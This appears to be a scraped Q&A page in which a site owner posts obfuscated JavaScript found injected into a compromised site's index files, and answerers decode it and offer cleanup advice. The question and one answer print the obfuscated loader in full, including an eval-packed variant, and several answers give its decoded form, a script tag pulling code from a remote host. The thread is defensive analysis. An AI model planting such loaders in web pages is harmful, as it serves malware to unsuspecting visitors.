Tutorial :Obscure JavaScript code in index.php/index.html files



Question:

maybe someone here can help or explain what happened. Just noticed today that on one of my client sites all index.php / index.html got replaced and some obscure javascript code was added. The code is below:

<script type="text/javascript">  var nhZE2uSD="Ow8xN18Ow8xN31";  var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72";   var usW1446O1="Ow8xN69Ow8xN70Ow8xN74Ow8xN20";   var usW1446O2="Ow8xN74Ow8xN79Ow8xN70Ow8xN65";   var usW1446O3="Ow8xN3dOw8xN22Ow8xN74Ow8xN65";   var usW1446O4="Ow8xN78Ow8xN74Ow8xN2fOw8xN6a";   var usW1446O5="Ow8xN61Ow8xN76Ow8xN61Ow8xN73";   var usW1446O6="Ow8xN63Ow8xN72Ow8xN69Ow8xN70";   var usW1446O7="Ow8xN74Ow8xN22Ow8xN20Ow8xN73";   var usW1446O8="Ow8xN72Ow8xN63Ow8xN3dOw8xN22";   var usW1446O9="Ow8xN68Ow8xN74Ow8xN74Ow8xN70";   var usW1446O10="Ow8xN3aOw8xN2fOw8xN2fOw8xN61";   var usW1446O11="Ow8xN6eOw8xN6eOw8xN6fOw8xN75";   var usW1446O12="Ow8xN2eOw8xN73Ow8xN65Ow8xN72";   var usW1446O13="Ow8xN76Ow8xN65Ow8xN68Ow8xN74";   var usW1446O14="Ow8xN74Ow8xN70Ow8xN2eOw8xN63";   var usW1446O15="Ow8xN6fOw8xN6dOw8xN2fOw8xN2f";   var usW1446O16="Ow8xN6dOw8xN6cOw8xN2eOw8xN70";   var usW1446O17="Ow8xN68Ow8xN70Ow8xN22Ow8xN3e";   var usW1446O18="Ow8xN20Ow8xN3cOw8xN2fOw8xN73";   var usW1446O19="Ow8xN63Ow8xN72Ow8xN69Ow8xN70";   var usW1446O20="Ow8xN74Ow8xN3e";   var JgUg10US="g4Uuq18Ow8xN31";  var Q8NVsUq5=usW1446O0+usW1446O1+usW1446O2+usW1446O3+usW1446O4+usW1446O5+usW1446O6+usW1446O7+usW  1446O8+usW1446O9+usW1446O10+usW1446O11+usW1446O12+usW1446O13+usW1446O14+usW1446O15+usW1446O16+usW1446O17+usW1446O18+usW1446O19+usW1446O20;   CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%");  var KcQGBJKD=unescape;  var nhZE2uSD="cZLH618g4Uuq31";  q9124=this;   var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];  WrEGuKeo.write(KcQGBJKD(CvhvkAeR));  </script>  

Can someone explain me what the code does?

Thanks for any help.


Solution:1

Looks like site has been compromised, based on the php tag, I would suggest you to use the HTML Purifier or OWASP to make things a lot secure.

You must disable the eval construct and allow_url_fopen settings from php.ini.

Analyze the server settings for any security holes with:

PHPSecInfo


Solution:2

It's malware. It injects:

<script type="text/javascript" src="http://annou.servehttp.com//ml.php"> </script>  

Needless to say, I don't recommend visiting that domain.

Most of the script is variable assignments for obfuscation. If you execute everything but the last line (this part doesn't use any unknown functions), you can then print WrEGuKeo (document) and KcQGBJKD(CvhvkAeR) (the above string). KcQGBJKD is just unescape.


Solution:3

It's not very well obfuscated, so just run through it line by line in your head:

/* ignore this for now, we'll get to it later  var nhZE2uSD="Ow8xN18Ow8xN31";  var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72";   ...  var usW1446O20="Ow8xN74Ow8xN3e";   var JgUg10US="g4Uuq18Ow8xN31";  */  var Q8NVsUq5=usW1446O0+usW1446O1+us... // this just concatenates the above    /* this takes the above "gibberish" and turns it into URL-encoding, e.g.:   * 'Hello%20World' = 'Hello World'   */  CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%"); // replace 'Ow8xN' with '%'    /* give unescape() an alias */  var KcQGBJKD=unescape;    var nhZE2uSD="cZLH618g4Uuq31"; // this is pointless so far as I can tell    /* assign window to q9124 */  q9124=this;    /* WrEGuKeo = window[$something]   * to get the value of $something, remove all occurrences of Y,1,2,W,l,G,:   * from the gibberish to get: 'document'   * so this line actually reads:   * var WrEGuKeo = window["document"];   */  var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];    /*   * document.write(unescape($ourUrlEncodedStringAbove));   */  WrEGuKeo.write(KcQGBJKD(CvhvkAeR));  

I'd leave deciphering the URL-encoded string to you, but Matthew already gave it away.

Edit: I didn't want to go into the URL-encoding too deeply because it's a pretty simple process but takes up a lot of room. But check out the Wikipedia article if you need more info.


Solution:4

It's probably best that you don't run it as it looks like someone has tried to insert malicious code into your site.

Change your FTP password immediately and if your using a common script such as phpBB, Wordpress etc. make sure you have the latest updates to the scripts.


Solution:5

Doesn't look good. The site has most likely been compromised (cross-site scripting?)


Solution:6

Could be malicious code, make sure there have been no unauthorised access to your FTP etc, probably best to go and change all your usernames/passwords, virus scan your computer, and restore an old backup of the site.

It shouldn't just change on it's own, someone did it. Here is the code injected beautified:

eval(function (p, a, c, k, e, d) {  e = function (c) {      return (c35 ? String.fromCharCode(c + 29) : c.toString(36))  };  if (!''.replace(/^/, String)) {      while (c--) {          d[e(c)] = k[c] || e(c)      }      k = [function (e) {          return d[e]      }];      e = function () {          return '\\w+'      };      c = 1  };  while (c--) {      if (k[c]) {          p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])      }  }  return p  }('0 A="X";0 j="W";0 i="V";0 h="U";0 e="Y";0 f="T";0 k="13";0 r="12";0 p="11";0 o="10";0 n="14";0 d="P";0 q="J";0 c="K";0 4="I";0 3="L";0 2="S";0 1="M";0 5="R";0 6="Q";0 b="N";0 a="O";0 9="Z";0 7="1q";0 8="1k";0 m="1j";0 x="1i";0 H="1h";0 F="1l";0 D="1m";0 C="1p";0 E="15";0 G="1o";0 B="1n";0 z="1g";0 u="1f";0 19="18";0 t=j+i+h+e+f+k+r+p+o+n+d+q+c+4+3+2+1+5+6+b+a+9+7+8+m+x+H+F+D+C+E+G+B+z+u;l=t.v(/1c/g,"%");0 y=1d;0 A="1e";s=1b;0 w=s["1a".v(/[16\\:]/g,"")];w.17(y(l));', 62, 89, 'var|Qn4KGrEEJXY216|Qn4KGrEEJXY215|Qn4KGrEEJXY214|Qn4KGrEEJXY213|Qn4KGrEEJXY217|Qn4KGrEEJXY218|Qn4KGrEEJXY222|Qn4KGrEEJXY223|Qn4KGrEEJXY221|Qn4KGrEEJXY220|Qn4KGrEEJXY219|Qn4KGrEEJXY212|Qn4KGrEEJXY210|Qn4KGrEEJXY23|Qn4KGrEEJXY24||Qn4KGrEEJXY22|Qn4KGrEEJXY21|Qn4KGrEEJXY20|Qn4KGrEEJXY25|Sdo7QoQybTJs|Qn4KGrEEJXY224|Qn4KGrEEJXY29|Qn4KGrEEJXY28|Qn4KGrEEJXY27|Qn4KGrEEJXY211|Qn4KGrEEJXY26|q9124|ThAyIvzqbEQQ|Qn4KGrEEJXY234|replace|WNWOcwoyad61|Qn4KGrEEJXY225|pX8f6fgPNrOg|Qn4KGrEEJXY233|HYipCnqdJpgI|Qn4KGrEEJXY232|Qn4KGrEEJXY229|Qn4KGrEEJXY228|Qn4KGrEEJXY230|Qn4KGrEEJXY227|Qn4KGrEEJXY231|Qn4KGrEEJXY226|dOUp4s2fOUp4s74OUp4s72|s74OUp4s74OUp4s70OUp4s|2eOUp4s63OUp4s6fOUp4s6|OUp4s66OUp4s2fOUp4s67O|p4s68OUp4s70OUp4s3fOUp|20OUp4s77OUp4s69OUp4s6|4OUp4s74OUp4s68OUp4s3d|4s76OUp4s65OUp4s68OUp4|s3dOUp4s31OUp4s22OUp4s|4s73OUp4s69OUp4s64OUp4|Up4s6fOUp4s2eOUp4s70OU|s22OUp4s68OUp4s74OUp4s|p4s65OUp4s20OUp4s73OUp|Up4s72OUp4s61OUp4s6dOU|OUp4s3cOUp4s69OUp4s66O|OUp4s17OUp4s34|4s72OUp4s63OUp4s3dOUp4|OUp4s22OUp4s31OUp4s30O|Up4s65OUp4s6dOUp4s2eOU|OUp4s79OUp4s73OUp4s74O|fOUp4s2fOUp4s65OUp4s73|74OUp4s70OUp4s3aOUp4s2|p4s73OUp4s65OUp4s72OUp|p4s3dOUp4s22OUp4s30OUp|Y12WlG|write|VzJjJ17OUp4s34|BbdzeevMKHSt|WYd1GoGYc2uG1mYGe2YnltY|this|OUp4s|unescape|CuPm017VzJjJ34|5OUp4s3e|72OUp4s61OUp4s6dOUp4s6|22OUp4s20OUp4s66OUp4s7|s22OUp4s31OUp4s30OUp4s|4s68OUp4s74OUp4s3dOUp4|p4s65OUp4s69OUp4s67OUp|2OUp4s61OUp4s6dOUp4s65|OUp4s62OUp4s6fOUp4s72O|s2fOUp4s69OUp4s66OUp4s|4s22OUp4s3eOUp4s3cOUp4|Up4s64OUp4s65OUp4s72OU|Up4s22OUp4s20OUp4s68OU'.split('|'), 0, {}))  


Solution:7

Here is the deobfuscated JavaScript code:

<script type="text/javascript" src="http://annou.servehttp.com//ml.php"> </script>  

Note:If u also have question or solution just comment us below or mail us on toontricks1994@gmail.com
Previous
Next Post »